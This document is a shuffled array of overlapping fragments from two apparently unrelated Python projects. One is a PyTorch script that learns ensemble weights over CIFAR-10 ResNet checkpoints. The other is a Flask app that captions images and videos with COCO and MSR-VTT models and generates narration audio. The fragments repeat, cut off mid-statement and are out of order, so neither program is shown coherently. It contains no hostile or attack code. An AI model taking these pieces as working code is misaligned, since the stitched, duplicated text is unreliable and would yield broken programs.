"'vgg19' : VGG('VGG19'), } chpt_vanilla_dict = { 'resnet18': ['R18_1', 'R18_2', 'R18_3'], 'resnet50': ['R50_1',",
"def main(): checkpoint_dir = 'results_ensembles/{}'.format(args.name) if not os.path.exists(checkpoint_dir): os.makedirs(checkpoint_dir) ## Logging logging.basicConfig(filename=os.path.join(checkpoint_dir, 'optim.log'),",
"every 100 iterations # if i % 100 == 0: # writer_train.add_scalar('train_acc', train_acc,",
"'optim.log'), level=logging.INFO) console = logging.StreamHandler() logging.getLogger().addHandler(console) console.setLevel(logging.INFO) logging.info(args) writer_test = SummaryWriter(log_dir=os.path.join(checkpoint_dir, 'optim')) ##",
"# test_loss, test_acc = test(net, testloader, criterion, best_acc) # logging.info('=> Saving model with",
"targets = targets.to(device) # [bs] outputs = model(inputs) loss = criterion(outputs, targets) test_loss",
"print('=> Using {} models {}'.format(num_models, args.model)) model = model_dict[args.model] model = model.to(device) model.train()",
"VGG('VGG19'), } chpt_vanilla_dict = { 'resnet18': ['R18_1', 'R18_2', 'R18_3'], 'resnet50': ['R50_1', 'R50_2', 'R50_3'],",
"'resnet18': ['R18_augm1', 'R18_augm2', 'R18_augm3'], 'resnet50': ['R50_augm1', 'R50_augm2', 'R50_augm3'], } chpt_name = 'net_80.pth' def",
"Create model model_names = chpt_augm_dict[args.model] if args.use_augm else chpt_vanilla_dict[args.model] num_models = len(model_names) print('=>",
"to init weight as required torch.manual_seed(0) device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")",
"parser.add_argument('--use_augm', action='store_true', help='use data augmentations?') parser.add_argument('--lr', default=1e-2, type=float, help='learning rate') parser.add_argument('--iter', default=100, type=int,",
"/ total_samples # # log metrics to TB every 100 iterations # if",
"len(testset), batch_size = 1000, shuffle = False, # sampler = data_sampler(testset, shuffle=False), num_workers",
"break # train_loss = 0 # total_samples, correct_samples = 0, 0 # batch",
"num_models = len(model_names) print('=> Using {} models {}'.format(num_models, args.model)) model = model_dict[args.model] model",
"/ total_samples total_test_loss = test_loss / (batch_idx+1) return total_test_loss, test_acc def main(): checkpoint_dir",
"'ship', 'truck') model_dict = { 'resnet18' : ResNet18(), # 11m params 'resnet34' :",
"args.iter: # print(\"TRAINING IS DONE!\") # break # train_loss = 0 # total_samples,",
"os.path.exists(checkpoint_dir): os.makedirs(checkpoint_dir) ## Logging logging.basicConfig(filename=os.path.join(checkpoint_dir, 'optim.log'), level=logging.INFO) console = logging.StreamHandler() logging.getLogger().addHandler(console) console.setLevel(logging.INFO) logging.info(args)",
"3, 32, 32] # targets = targets.to(device) # [bs] # outputs = net(inputs)",
"# if i % args.iter_save == 0: # test_loss, test_acc = test(net, testloader,",
"batch # inputs = inputs.to(device) # [bs, 3, 32, 32] # targets =",
"'iter' : i, # } # torch.save(state, os.path.join(checkpoint_dir, 'net_{}.pth'.format( int( i / 1000)",
"at iteration {} K'.format(test_loss, test_acc, int( i / 1000)) ) # state =",
"= model(inputs) loss = criterion(outputs, targets) test_loss += loss.item() _, predicted = outputs.max(1)",
"nn import torch.optim as optim import torch.nn.functional as F import torch.backends.cudnn as cudnn",
"use this to init weight as required torch.manual_seed(0) device = torch.device(\"cuda\" if torch.cuda.is_available()",
"targets) in enumerate(testloader): inputs = inputs.to(device) # [bs, 3, 32, 32] targets =",
"not name.endswith('num_batches_tracked'): model_params = torch.nn.Parameter( model_params + alphas[ii] * checkpoint[name] ) batch =",
"+= loss.item() _, predicted = outputs.max(1) total_samples += targets.size(0) correct_samples += predicted.eq(targets).sum().item() #",
"inputs = inputs.to(device) # [bs, 3, 32, 32] # targets = targets.to(device) #",
"outputs = model(inputs) loss = criterion(outputs, targets) print(alphas) # print(list(model.parameters())[0][0]) optimizer.zero_grad() loss.backward() optimizer.step()",
"['R50_augm1', 'R50_augm2', 'R50_augm3'], } chpt_name = 'net_80.pth' def test(model, testloader, criterion, best_acc): net.eval()",
"model = model_dict[args.model] model = model.to(device) model.train() ## Init alphas and optimizer alphas",
"+= predicted.eq(targets).sum().item() # train_acc = correct_samples / total_samples # # log metrics to",
"Preparing data..') transform_test = transforms.Compose([ transforms.ToTensor(), transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)), ])",
"# scheduler.step() # train_loss += loss.item() # _, predicted = outputs.max(1) # total_samples",
"writer_test.add_scalar('test_acc', test_acc, i) # writer_test.add_scalar('test_loss', test_loss, i) # if test_acc > best_acc: #",
"help='learning rate') parser.add_argument('--iter', default=100, type=int, help='number of total iterations to run') args =",
"'resnet50': ['R50_augm1', 'R50_augm2', 'R50_augm3'], } chpt_name = 'net_80.pth' def test(model, testloader, criterion, best_acc):",
"--> {} at iteration {} K'.format(best_acc, test_acc, int(i / 1000) )) # state",
"> args.iter: # print(\"TRAINING IS DONE!\") # break # train_loss = 0 #",
"at TB test_acc = 100. * correct_samples / total_samples total_test_loss = test_loss /",
"= torchvision.datasets.CIFAR10(root='data', train=False, download=True, transform=transform_test) testloader = torch.utils.data.DataLoader( testset, # batch_size = len(testset),",
"= logging.StreamHandler() logging.getLogger().addHandler(console) console.setLevel(logging.INFO) logging.info(args) writer_test = SummaryWriter(log_dir=os.path.join(checkpoint_dir, 'optim')) ## Data print('=> Preparing",
"32] targets = targets.to(device) # [bs] outputs = model(inputs) loss = criterion(outputs, targets)",
"'horse', 'ship', 'truck') model_dict = { 'resnet18' : ResNet18(), # 11m params 'resnet34'",
"torchvision.datasets.CIFAR10(root='data', train=False, download=True, transform=transform_test) testloader = torch.utils.data.DataLoader( testset, # batch_size = len(testset), batch_size",
"help='name of experiment') parser.add_argument('--model', default='resnet18', type=str, help='model to train') parser.add_argument('--use_augm', action='store_true', help='use data",
"# 23m 'resnet101': ResNet101(), # 42m 'resnet152': ResNet152(), # 58m 'vgg19' : VGG('VGG19'),",
"save loss over the whole test set at TB test_acc = 100. *",
"enumerate(testloader): inputs = inputs.to(device) # [bs, 3, 32, 32] targets = targets.to(device) #",
"torch.nn.Parameter(alphas) optimizer = optim.Adam([alphas], lr=args.lr, betas=(0.9, 0.999)) ### Main optimization loop ## TODO:",
"i > args.iter: # print(\"TRAINING IS DONE!\") # break # train_loss = 0",
"# torch.save(state, os.path.join(checkpoint_dir, 'net_best.pth')) # best_acc = test_acc if __name__ == '__main__': main()",
"torchvision import torchvision.transforms as transforms from models import * parser = argparse.ArgumentParser() parser.add_argument('--name',",
"0 with torch.no_grad(): for batch_idx, (inputs, targets) in enumerate(testloader): inputs = inputs.to(device) #",
"alphas = torch.rand(num_models) / num_models alphas[-1] = 1 - sum(alphas[:-1]) assert sum(alphas).item() ==",
"alphas = torch.nn.Parameter(alphas) optimizer = optim.Adam([alphas], lr=args.lr, betas=(0.9, 0.999)) ### Main optimization loop",
"iter(testloader) ## Create model model_names = chpt_augm_dict[args.model] if args.use_augm else chpt_vanilla_dict[args.model] num_models =",
"from models import * parser = argparse.ArgumentParser() parser.add_argument('--name', default='', type=str, help='name of experiment')",
"ResNet101(), # 42m 'resnet152': ResNet152(), # 58m 'vgg19' : VGG('VGG19'), } chpt_vanilla_dict =",
"logging.info(args) writer_test = SummaryWriter(log_dir=os.path.join(checkpoint_dir, 'optim')) ## Data print('=> Preparing data..') transform_test = transforms.Compose([",
"models import * parser = argparse.ArgumentParser() parser.add_argument('--name', default='', type=str, help='name of experiment') parser.add_argument('--model',",
"outputs.max(1) total_samples += targets.size(0) correct_samples += predicted.eq(targets).sum().item() # save loss over the whole",
"= data_sampler(testset, shuffle=False), num_workers = 4, ) loader = iter(testloader) ## Create model",
"in range(num_iters): # load model weights and multiply with alphas for ii, model_name",
"= outputs.max(1) # total_samples += targets.size(0) # correct_samples += predicted.eq(targets).sum().item() # train_acc =",
"over the whole test set at TB test_acc = 100. * correct_samples /",
"= nn.CrossEntropyLoss() alphas = torch.nn.Parameter(alphas) optimizer = optim.Adam([alphas], lr=args.lr, betas=(0.9, 0.999)) ### Main",
"len(model_names) print('=> Using {} models {}'.format(num_models, args.model)) model = model_dict[args.model] model = model.to(device)",
"model_params + alphas[ii] * checkpoint[name] ) batch = next(loader) inputs, targets = batch",
"ResNet34(), # 21m 'resnet50' : ResNet50(), # 23m 'resnet101': ResNet101(), # 42m 'resnet152':",
"= { 'resnet18': ['R18_1', 'R18_2', 'R18_3'], 'resnet50': ['R50_1', 'R50_2', 'R50_3'], } chpt_augm_dict =",
"0.1994, 0.2010)), ]) testset = torchvision.datasets.CIFAR10(root='data', train=False, download=True, transform=transform_test) testloader = torch.utils.data.DataLoader( testset,",
"= torch.nn.Parameter( model_params * alphas[ii] ) else: for name, model_params in model.named_parameters(): if",
"# print(list(model.parameters())[0][0]) optimizer.zero_grad() loss.backward() optimizer.step() print(alphas) # print(list(model.parameters())[0][0]) pdb.set_trace() # criterion = nn.CrossEntropyLoss()",
"ACC: {} at iteration {} K'.format(test_loss, test_acc, int( i / 1000)) ) #",
"i % 100 == 0: # writer_train.add_scalar('train_acc', train_acc, i) # writer_train.add_scalar('train_loss', train_loss, i)",
"# writer_train.add_scalar('train_acc', train_acc, i) # writer_train.add_scalar('train_loss', train_loss, i) # # test model and",
"False, # sampler = data_sampler(testset, shuffle=False), num_workers = 4, ) loader = iter(testloader)",
"total_samples # # log metrics to TB every 100 iterations # if i",
"inputs, targets = batch inputs = inputs.to(device) targets = targets.to(device) outputs = model(inputs)",
"= targets.to(device) outputs = model(inputs) loss = criterion(outputs, targets) print(alphas) # print(list(model.parameters())[0][0]) optimizer.zero_grad()",
"momentum=0.9, weight_decay=1e-4) # for idx in pbar: # i = idx + args.start_iter",
"= batch # inputs = inputs.to(device) # [bs, 3, 32, 32] # targets",
"TB every 100 iterations # if i % 100 == 0: # writer_train.add_scalar('train_acc',",
"chpt_augm_dict = { 'resnet18': ['R18_augm1', 'R18_augm2', 'R18_augm3'], 'resnet50': ['R50_augm1', 'R50_augm2', 'R50_augm3'], } chpt_name",
"torchvision.transforms as transforms from models import * parser = argparse.ArgumentParser() parser.add_argument('--name', default='', type=str,",
"'R18_3'], 'resnet50': ['R50_1', 'R50_2', 'R50_3'], } chpt_augm_dict = { 'resnet18': ['R18_augm1', 'R18_augm2', 'R18_augm3'],",
"# } # torch.save(state, os.path.join(checkpoint_dir, 'net_{}.pth'.format( int( i / 1000) ))) # net.train()",
"def test(model, testloader, criterion, best_acc): net.eval() test_loss = 0 total_samples, correct_samples = 0,",
"with torch.no_grad(): for batch_idx, (inputs, targets) in enumerate(testloader): inputs = inputs.to(device) # [bs,",
"'resnet152': ResNet152(), # 58m 'vgg19' : VGG('VGG19'), } chpt_vanilla_dict = { 'resnet18': ['R18_1',",
"weights and multiply with alphas for ii, model_name in enumerate(model_names): model_path = os.path.join('results',",
"K'.format(test_loss, test_acc, int( i / 1000)) ) # state = { # 'net'",
"+ alphas[ii] * checkpoint[name] ) batch = next(loader) inputs, targets = batch inputs",
"train_acc, i) # writer_train.add_scalar('train_loss', train_loss, i) # # test model and save it",
"- sum(alphas[:-1]) assert sum(alphas).item() == 1, 'Alphas should sum to 1' num_iters =",
"name.endswith('num_batches_tracked'): model_params = torch.nn.Parameter( model_params + alphas[ii] * checkpoint[name] ) batch = next(loader)",
"-- ACC: {} at iteration {} K'.format(test_loss, test_acc, int( i / 1000)) )",
"args.model)) model = model_dict[args.model] model = model.to(device) model.train() ## Init alphas and optimizer",
"issue for it in range(num_iters): # load model weights and multiply with alphas",
"test_acc, int( i / 1000)) ) # state = { # 'net' :",
"{} at iteration {} K'.format(best_acc, test_acc, int(i / 1000) )) # state =",
"for name, model_params in model.named_parameters(): if not name.endswith('num_batches_tracked'): model_params = torch.nn.Parameter( model_params +",
"this to init weight as required torch.manual_seed(0) device = torch.device(\"cuda\" if torch.cuda.is_available() else",
"ii, model_name in enumerate(model_names): model_path = os.path.join('results', model_name, chpt_name) checkpoint = torch.load(model_path)['net'] if",
"DONE!\") # break # train_loss = 0 # total_samples, correct_samples = 0, 0",
"lr=args.lr, betas=(0.9, 0.999)) ### Main optimization loop ## TODO: alphas are not updating",
"multiply with alphas for ii, model_name in enumerate(model_names): model_path = os.path.join('results', model_name, chpt_name)",
"torch.no_grad(): for batch_idx, (inputs, targets) in enumerate(testloader): inputs = inputs.to(device) # [bs, 3,",
"targets = targets.to(device) # [bs] # outputs = net(inputs) # loss = criterion(outputs,",
"['R18_1', 'R18_2', 'R18_3'], 'resnet50': ['R50_1', 'R50_2', 'R50_3'], } chpt_augm_dict = { 'resnet18': ['R18_augm1',",
"improved from {} --> {} at iteration {} K'.format(best_acc, test_acc, int(i / 1000)",
"# optimizer.zero_grad() # loss.backward() # optimizer.step() # scheduler.step() # train_loss += loss.item() #",
"torch.manual_seed(0) device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\") classes = ('plane', 'car', 'bird',",
"targets.to(device) outputs = model(inputs) loss = criterion(outputs, targets) print(alphas) # print(list(model.parameters())[0][0]) optimizer.zero_grad() loss.backward()",
"state = { # 'net' : net.state_dict(), # 'acc' : test_acc, # 'iter'",
"SummaryWriter import torchvision import torchvision.transforms as transforms from models import * parser =",
"} # torch.save(state, os.path.join(checkpoint_dir, 'net_{}.pth'.format( int( i / 1000) ))) # net.train() #",
"# 'iter' : i, # } # torch.save(state, os.path.join(checkpoint_dir, 'net_best.pth')) # best_acc =",
"print(alphas) # print(list(model.parameters())[0][0]) optimizer.zero_grad() loss.backward() optimizer.step() print(alphas) # print(list(model.parameters())[0][0]) pdb.set_trace() # criterion =",
"test_acc, # 'iter' : i, # } # torch.save(state, os.path.join(checkpoint_dir, 'net_best.pth')) # best_acc",
"name, model_params in model.named_parameters(): if not name.endswith('num_batches_tracked'): model_params = torch.nn.Parameter( model_params + alphas[ii]",
"* correct_samples / total_samples total_test_loss = test_loss / (batch_idx+1) return total_test_loss, test_acc def",
"for idx in pbar: # i = idx + args.start_iter # if i",
"inputs = inputs.to(device) targets = targets.to(device) outputs = model(inputs) loss = criterion(outputs, targets)",
"torch.load(model_path)['net'] if ii==0: model.load_state_dict(checkpoint) for name, model_params in model.named_parameters(): if not name.endswith('num_batches_tracked'): model_params",
"data..') transform_test = transforms.Compose([ transforms.ToTensor(), transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)), ]) testset",
"net(inputs) # loss = criterion(outputs, targets) # optimizer.zero_grad() # loss.backward() # optimizer.step() #",
"test_acc def main(): checkpoint_dir = 'results_ensembles/{}'.format(args.name) if not os.path.exists(checkpoint_dir): os.makedirs(checkpoint_dir) ## Logging logging.basicConfig(filename=os.path.join(checkpoint_dir,",
"if torch.cuda.is_available() else \"cpu\") classes = ('plane', 'car', 'bird', 'cat', 'deer', 'dog', 'frog',",
"targets) test_loss += loss.item() _, predicted = outputs.max(1) total_samples += targets.size(0) correct_samples +=",
"parser.add_argument('--model', default='resnet18', type=str, help='model to train') parser.add_argument('--use_augm', action='store_true', help='use data augmentations?') parser.add_argument('--lr', default=1e-2,",
"TB test_acc = 100. * correct_samples / total_samples total_test_loss = test_loss / (batch_idx+1)",
"(batch_idx+1) return total_test_loss, test_acc def main(): checkpoint_dir = 'results_ensembles/{}'.format(args.name) if not os.path.exists(checkpoint_dir): os.makedirs(checkpoint_dir)",
"'results_ensembles/{}'.format(args.name) if not os.path.exists(checkpoint_dir): os.makedirs(checkpoint_dir) ## Logging logging.basicConfig(filename=os.path.join(checkpoint_dir, 'optim.log'), level=logging.INFO) console = logging.StreamHandler()",
"# use this to init weight as required torch.manual_seed(0) device = torch.device(\"cuda\" if",
"argparse import torch import torch.nn as nn import torch.optim as optim import torch.nn.functional",
"model_names = chpt_augm_dict[args.model] if args.use_augm else chpt_vanilla_dict[args.model] num_models = len(model_names) print('=> Using {}",
"test_acc > best_acc: # logging.info('=> Accuracy improved from {} --> {} at iteration",
"= outputs.max(1) total_samples += targets.size(0) correct_samples += predicted.eq(targets).sum().item() # save loss over the",
"weight_decay=1e-4) # for idx in pbar: # i = idx + args.start_iter #",
"num_iters = args.iter criterion = nn.CrossEntropyLoss() alphas = torch.nn.Parameter(alphas) optimizer = optim.Adam([alphas], lr=args.lr,",
"optim import torch.nn.functional as F import torch.backends.cudnn as cudnn from torch.utils.tensorboard import SummaryWriter",
"'R50_2', 'R50_3'], } chpt_augm_dict = { 'resnet18': ['R18_augm1', 'R18_augm2', 'R18_augm3'], 'resnet50': ['R50_augm1', 'R50_augm2',",
"))) # net.train() # writer_test.add_scalar('test_acc', test_acc, i) # writer_test.add_scalar('test_loss', test_loss, i) # if",
"nn.CrossEntropyLoss() # optimizer = optim.SGD(net.parameters(), lr=args.lr, momentum=0.9, weight_decay=1e-4) # for idx in pbar:",
"test_acc, i) # writer_test.add_scalar('test_loss', test_loss, i) # if test_acc > best_acc: # logging.info('=>",
"test model and save it every 5000 iterations # if i % args.iter_save",
"in pbar: # i = idx + args.start_iter # if i > args.iter:",
"model(inputs) loss = criterion(outputs, targets) print(alphas) # print(list(model.parameters())[0][0]) optimizer.zero_grad() loss.backward() optimizer.step() print(alphas) #",
"total_samples, correct_samples = 0, 0 # batch = next(loader) # inputs, targets =",
"# batch = next(loader) # inputs, targets = batch # inputs = inputs.to(device)",
"% 100 == 0: # writer_train.add_scalar('train_acc', train_acc, i) # writer_train.add_scalar('train_loss', train_loss, i) #",
"0.2010)), ]) testset = torchvision.datasets.CIFAR10(root='data', train=False, download=True, transform=transform_test) testloader = torch.utils.data.DataLoader( testset, #",
"]) testset = torchvision.datasets.CIFAR10(root='data', train=False, download=True, transform=transform_test) testloader = torch.utils.data.DataLoader( testset, # batch_size",
"'net_{}.pth'.format( int( i / 1000) ))) # net.train() # writer_test.add_scalar('test_acc', test_acc, i) #",
": i, # } # torch.save(state, os.path.join(checkpoint_dir, 'net_best.pth')) # best_acc = test_acc if",
"### Main optimization loop ## TODO: alphas are not updating -- solve this",
"default='', type=str, help='name of experiment') parser.add_argument('--model', default='resnet18', type=str, help='model to train') parser.add_argument('--use_augm', action='store_true',",
"testset = torchvision.datasets.CIFAR10(root='data', train=False, download=True, transform=transform_test) testloader = torch.utils.data.DataLoader( testset, # batch_size =",
"# 42m 'resnet152': ResNet152(), # 58m 'vgg19' : VGG('VGG19'), } chpt_vanilla_dict = {",
"idx + args.start_iter # if i > args.iter: # print(\"TRAINING IS DONE!\") #",
")) # state = { # 'net' : net.state_dict(), # 'acc' : test_acc,",
"log metrics to TB every 100 iterations # if i % 100 ==",
"classes = ('plane', 'car', 'bird', 'cat', 'deer', 'dog', 'frog', 'horse', 'ship', 'truck') model_dict",
"parser = argparse.ArgumentParser() parser.add_argument('--name', default='', type=str, help='name of experiment') parser.add_argument('--model', default='resnet18', type=str, help='model",
"total_samples total_test_loss = test_loss / (batch_idx+1) return total_test_loss, test_acc def main(): checkpoint_dir =",
"targets.to(device) # [bs] # outputs = net(inputs) # loss = criterion(outputs, targets) #",
"default=1e-2, type=float, help='learning rate') parser.add_argument('--iter', default=100, type=int, help='number of total iterations to run')",
"level=logging.INFO) console = logging.StreamHandler() logging.getLogger().addHandler(console) console.setLevel(logging.INFO) logging.info(args) writer_test = SummaryWriter(log_dir=os.path.join(checkpoint_dir, 'optim')) ## Data",
"torch.utils.tensorboard import SummaryWriter import torchvision import torchvision.transforms as transforms from models import *",
"model_params * alphas[ii] ) else: for name, model_params in model.named_parameters(): if not name.endswith('num_batches_tracked'):",
"= args.iter criterion = nn.CrossEntropyLoss() alphas = torch.nn.Parameter(alphas) optimizer = optim.Adam([alphas], lr=args.lr, betas=(0.9,",
"/ num_models alphas[-1] = 1 - sum(alphas[:-1]) assert sum(alphas).item() == 1, 'Alphas should",
"= optim.SGD(net.parameters(), lr=args.lr, momentum=0.9, weight_decay=1e-4) # for idx in pbar: # i ="
] |
[
"narrator.gen_audio_file( caption, app.config['UPLOAD_DIR'] + cap_audio) return redirect(url_for('uploaded_file', filename=file.filename, cap_audio=cap_audio, caption=caption, typ=typ)) # Generate",
"to file, get ext and determine type file.filename = file.filename.replace(' ', '_') file_path",
"= file.filename.replace(' ', '_') file_path = save_file(file) filename, ext = split_filename(file) typ =",
"rand_im_ids if x not in samplesDF['id'].values.tolist()][ :len(im_names)] rand_vid_ids = msrvttCaptionDF[msrvttCaptionDF['set'] == 'test'].sample(n=32)[ 'vid_id'].values.tolist()",
"# Find the nearest gt nearest_gt = '' best_score = 0.0 for gt",
"# Generate audio files for each caption for i, caption in enumerate(captions): narrator.gen_audio_file(",
"', '_') file_path = save_file(file) filename, ext = split_filename(file) typ = determine_type(ext, by_scene)",
"'caption'] = caption samplesDF.loc[name, 'gt'] = gt print('Images updated!') for i, (name, vid_id)",
"msrvtt_vocab_path=app.config['MSRVTT_VOCAB_PATH'], base_model=app.config['ENCODER_MODEL'], ic_model_path=app.config['IC_MODEL_PATH'], vc_model_path=app.config['VC_MODEL_PATH'], ic_rnn_type=app.config['IC_RNN_TYPE'], vc_rnn_type=app.config['VC_RNN_TYPE'] ) # Load samples from file try:",
"save_file(file) filename, ext = split_filename(file) typ = determine_type(ext, by_scene) if typ == 'image':",
"= msrvttCaptionDF[msrvttCaptionDF['vid_id'] == vid_id]['caption'] gts = gts.apply(lambda x: narrator.msrvtt_vocab.encode( x, app.config['MAX_LEN'] + 1))",
"'url': 'image' + str(ix) + '.jpg', 'gt': im_sample['gt'], 'gt_audio': 'image' + str(ix) +",
"by_scene: caption = narrator.gen_caption(file_path, beam_size=app.config[ 'BEAM_SIZE'], as_string=True, by_scene=by_scene).capitalize() cap_audio = filename + '.ogg'",
"PIL from flask import render_template, request, redirect, url_for, send_from_directory, session from app import",
"str(ix) + '.mp4', 'gt': vid_sample['gt'], 'gt_audio': 'video' + str(ix) + '_gt.ogg', 'caption': vid_sample['caption'],",
"for x in rand_im_ids if x not in samplesDF['id'].values.tolist()][ :len(im_names)] rand_vid_ids = msrvttCaptionDF[msrvttCaptionDF['set']",
"updated!') # Save samples dataframe samplesDF.to_csv(app.config['SAMPLES_DIR'] + 'sample_captions.csv') # Load samples IM_SAMPLES_DICT =",
"'caption': captions }) # Capitalize sceneSamplesDF['caption'] = sceneSamplesDF[ 'caption'].apply(lambda x: x.capitalize()) # Generate",
"# Load samples from file try: samplesDF = pd.read_csv( app.config['SAMPLES_DIR'] + 'sample_captions.csv', index_col=0)",
"= file.filename.split('.') if isinstance(filename, list): filename = '_'.join(filename) # Replace existing . with",
"in app.config['VID_EXTENSIONS']: if by_scene: return 'scene' return 'video' return 'image' def generate_caption(file, by_scene):",
"redirect to demo_output page if not by_scene: caption = narrator.gen_caption(file_path, beam_size=app.config['BEAM_SIZE'], as_string=True, by_scene=by_scene).capitalize()",
"redirect to demo_output # page captions, time_codes = narrator.gen_caption(file_path, beam_size=app.config[ 'BEAM_SIZE'], as_string=True, by_scene=by_scene)",
"'.' + str(i) + '.ogg', 'caption': caption.capitalize() }) session['scenes_dict'] = scenes_dict return redirect(url_for('uploaded_file',",
"filepath for scene example scene_example_file = app.config[ 'SAMPLES_DIR'] + app.config['SCENE_EXAMPLE_FILE'] # Create scene",
"typ='scene', caption='scene', cap_audio='scene')) except KeyError as e: print(e) return render_template('demo.html', page='demo', title=app.config['TITLE']) @app.route('/demo/<filename>&<cap_audio>&<typ>&<caption>',",
"return render_template('about.html', page='about', title=app.config['TITLE']) @app.route('/demo', methods=['GET', 'POST']) def demo(): \"\"\"Render demo page.\"\"\" #",
"gt, app.config['SAMPLES_DIR'] + name + '_gt.ogg') narrator.gen_audio_file( caption, app.config['SAMPLES_DIR'] + name + '.ogg')",
"allowed_file(filename): \"\"\"Determine if a file has an allowed extension.\"\"\" return '.' in filename",
"'image': by_scene = False # Generate caption/audio and redirect to demo_output page if",
"gt print('Videos updated!') # Save samples dataframe samplesDF.to_csv(app.config['SAMPLES_DIR'] + 'sample_captions.csv') # Load samples",
"bleu = narrator.msrvtt_vocab.evaluate([gt], caption) if bleu > best_score: best_score = bleu nearest_gt =",
"Get all gt captions and encode/decode using vocabulary gts = cocoCaptionDF[cocoCaptionDF['id'] == im_id]['caption']",
"split_filename(file) typ = determine_type(ext, by_scene) if typ == 'image': by_scene = False #",
"##################################### APP #################################### ############################################################################## def allowed_file(filename): \"\"\"Determine if a file has an allowed",
"# Randomly select ids from their respective datasets and reject any that already",
"= pd.read_csv(app.config['MSRVTT_CAPTION_PATH']) # Determine images and videos to update im_names = [x for",
"dataframe sceneSamplesDF = pd.DataFrame({ 'time': scene_change_timecodes, 'caption': captions }) # Capitalize sceneSamplesDF['caption'] =",
"sceneSamplesDF = pd.DataFrame({ 'time': scene_change_timecodes, 'caption': captions }) # Capitalize sceneSamplesDF['caption'] = sceneSamplesDF[",
"files narrator.gen_audio_file( gt, app.config['SAMPLES_DIR'] + name + '_gt.ogg') narrator.gen_audio_file( caption, app.config['SAMPLES_DIR'] + name",
"(name, im_id) in enumerate(zip(im_names, rand_im_ids)): # Get image and generated caption url =",
"reject any that already have been # chosen rand_im_ids = cocoCaptionDF[cocoCaptionDF['set'] == app.config[",
"enumerate(zip(im_names, rand_im_ids)): # Get image and generated caption url = coco.loadImgs(im_id)[0]['coco_url'] caption =",
"+ '.csv', index=False) # Load samples dataframe else: sceneSamplesDF = pd.read_csv(scene_example_file + '.csv')",
"and if by_scene is requested from website file = request.files['file'] by_scene = 'by_scene'",
"as io import PIL from flask import render_template, request, redirect, url_for, send_from_directory, session",
"caption, app.config['UPLOAD_DIR'] + cap_audio) return redirect(url_for('uploaded_file', filename=file.filename, cap_audio=cap_audio, caption=caption, typ=typ)) # Generate caption/audio",
"def uploaded_file(filename, typ='image', caption=\"\", cap_audio=None): \"\"\"Render demo output page.\"\"\" # Duplicate of above",
"redirect(url_for('uploaded_file', filename=file.filename, typ='scene', caption='scene', cap_audio='scene')) except KeyError as e: print(e) return render_template('demo_output.html', filename=filename,",
"gt captions and encode/decode using vocabulary gts = cocoCaptionDF[cocoCaptionDF['id'] == im_id]['caption'] gts =",
"= [x for x in app.config['SAMPLES_TO_UPDATE'] if 'image' in x] vid_names = [x",
"request, redirect, url_for, send_from_directory, session from app import app sys.path.append(app.config['COCOAPI_PATH'] + 'PythonAPI') from",
"= 0.0 for gt in gts: bleu = narrator.coco_vocab.evaluate([gt], caption) if bleu >",
"i, row in sceneSamplesDF.iterrows(): SCENE_SAMPLES_DICT.append({ 'time': row['time'], 'cap_audio': app.config['SCENE_EXAMPLE_FILE'] + '.' + str(i)",
"str(i) + '.ogg', 'caption': row['caption'].capitalize() }) ############################################################################## ##################################### APP #################################### ############################################################################## def allowed_file(filename):",
"title=app.config['TITLE']) @app.route('/videos') def videos(): \"\"\"Render video examples page.\"\"\" return render_template('videos.html', vid_dict=VID_SAMPLES_DICT, page='videos', title=app.config['TITLE'])",
"= split_filename(file) typ = determine_type(ext, by_scene) if typ == 'image': by_scene = False",
"narrator.gen_audio_file( caption, app.config['SAMPLES_DIR'] + name + '.ogg') # Update samples dataframe samplesDF.loc[name, 'id']",
"Replace existing . with _ return filename, ext def determine_type(ext, by_scene): \"\"\"Determine if",
"caption/audio and redirect to demo_output page if not by_scene: caption = narrator.gen_caption(file_path, beam_size=app.config['BEAM_SIZE'],",
"update samples dataframe samplesDF.loc[name, 'id'] = vid_id samplesDF.loc[name, 'caption'] = caption samplesDF.loc[name, 'gt']",
"return redirect(url_for('uploaded_file', filename=file.filename, typ='scene', caption='scene', cap_audio='scene')) except KeyError as e: print(e) return render_template('demo_output.html',",
"[], [], []] for i, ix in enumerate(range(16)): im_sample = samplesDF.loc['image' + str(ix)]",
"scene example scene_example_file = app.config[ 'SAMPLES_DIR'] + app.config['SCENE_EXAMPLE_FILE'] # Create scene example if",
"+ '_gt.ogg') narrator.gen_audio_file( caption, app.config['SAMPLES_DIR'] + name + '.ogg') # update samples dataframe",
"cap_audio='scene')) except KeyError as e: print(e) return render_template('demo_output.html', filename=filename, typ=typ, caption=caption, cap_audio=cap_audio, page='demo',",
"'PythonAPI') from pycocotools.coco import COCO sys.path.append('../src/') from Narrator import Narrator # Construct classes",
"= cocoCaptionDF[cocoCaptionDF['set'] == app.config[ 'COCO_SET']].sample(n=32)['id'].values.tolist() rand_im_ids = [x for x in rand_im_ids if",
"vocabulary gts = cocoCaptionDF[cocoCaptionDF['id'] == im_id]['caption'] gts = gts.apply(lambda x: narrator.coco_vocab.encode( x, app.config['MAX_LEN']",
"image to samples directory shutil.copy(url, app.config['SAMPLES_DIR'] + name + '.mp4') # Generate audio",
"[[], [], [], []] for i, ix in enumerate(range(16)): im_sample = samplesDF.loc['image' +",
"'video' + str(ix) + '.mp4', 'gt': vid_sample['gt'], 'gt_audio': 'video' + str(ix) + '_gt.ogg',",
"app.config['COCOAPI_PATH'] + 'annotations/coco_captions.csv') msrvttCaptionDF = pd.read_csv(app.config['MSRVTT_CAPTION_PATH']) # Determine images and videos to update",
"+ str(i) + '.ogg', 'caption': caption.capitalize() }) session['scenes_dict'] = scenes_dict return redirect(url_for('uploaded_file', filename=file.filename,",
"'annotations/coco_captions.csv') msrvttCaptionDF = pd.read_csv(app.config['MSRVTT_CAPTION_PATH']) # Determine images and videos to update im_names =",
"narrator.gen_audio_file( gt, app.config['SAMPLES_DIR'] + name + '_gt.ogg') narrator.gen_audio_file( caption, app.config['SAMPLES_DIR'] + name +",
"image and video datasets coco = COCO(app.config[ 'COCOAPI_PATH'] + 'annotations/instances_{}.json'.format(app.config['COCO_SET'])) cocoCaptionDF = pd.read_csv(",
"examples page.\"\"\" return render_template('videos.html', vid_dict=VID_SAMPLES_DICT, page='videos', title=app.config['TITLE']) @app.route('/scenes') def scenes(): \"\"\"Render scene examples",
"scenes_dict = [] for i, caption in enumerate(captions): narrator.gen_audio_file(caption, app.config['UPLOAD_DIR'] + filename +",
